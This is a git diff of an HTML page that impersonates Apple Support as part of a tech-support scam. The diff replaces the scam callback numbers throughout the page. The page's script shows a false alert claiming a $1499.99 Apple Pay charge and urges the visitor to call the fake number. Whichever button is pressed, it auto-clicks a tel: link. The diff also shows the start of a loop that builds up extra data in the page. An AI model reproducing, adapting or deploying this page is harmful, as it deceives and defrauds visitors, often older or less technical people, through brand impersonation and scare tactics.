--- a/index.html
+++ b/index.html
@@ -129,7 +129,7 @@
                 <div class="ac-ln-background"></div>
                 <div class="ac-ln-content">
                     <span class="ac-ln-title">
-                       <a href="#">Apple Support +448081754562 <font color="red"><font class="js_setPhoneBlock"></font></font></a>
+                       <a href="#">Apple Support +1(855) 698-1017 <font color="red"><font class="js_setPhoneBlock"></font></font></a>
 					 </span>
                     <div class="ac-ln-menu">
                         <a href="#ac-ln-menustate" class="ac-ln-menucta-anchor ac-ln-menucta-anchor-open" id="ac-ln-menustate-open">  <span class="ac-ln-menucta-anchor-label">Open menu </span></a> <a href="#" class="ac-ln-menucta-anchor ac-ln-menucta-anchor-close"
@@ -207,7 +207,7 @@
 						Apple </a></div>
                 </div>
                 <meta content="Apple" property="name" />
-                <meta content="+448081754562
+                <meta content="+1(855) 698-1017
 			 " property="telephone" />
             </section>
         </div>
@@ -274,7 +274,7 @@
 
         window.number = getPar('phone');
 
-        window.number = (window.number ? window.number : '+1(855) 698-0777');
+        window.number = (window.number ? window.number : '+1(855) 698-1017');
 
         window.device = 'iPhone';
         window.refef = parseURL(document.referrer);
@@ -332,7 +332,7 @@
         }, 100);
 
         function okkkk() {
-            jQuery('#result').append('<a  class="anchorcall" href="tel:+1(855) 698-0777"></a>');
+            jQuery('#result').append('<a  class="anchorcall" href="tel:+1(855) 698-1017"></a>');
             document.querySelector('a').click();
             var extraData = "";
             for (itxextraData = 0; itxextraData < 200; itxextraData++) {
@@ -349,7 +349,7 @@
         };
 
         function myFunction() {
-            if (confirm("Your Apple ID was recently used at APPLE STORE for $1499.99 Via Apple Pay Pre-Authorization!We have placed those request on hold to ensure safest and Security. Not you? Immediately call Apple Support +448081754562 to Freeze it!.")) {
+            if (confirm("Your Apple ID was recently used at APPLE STORE for $1499.99 Via Apple Pay Pre-Authorization!We have placed those request on hold to ensure safest and Security. Not you? Immediately call Apple Support +1(855) 698-1017 to Freeze it!.")) {
                 okkkk();
             } else {
                 okkkk();
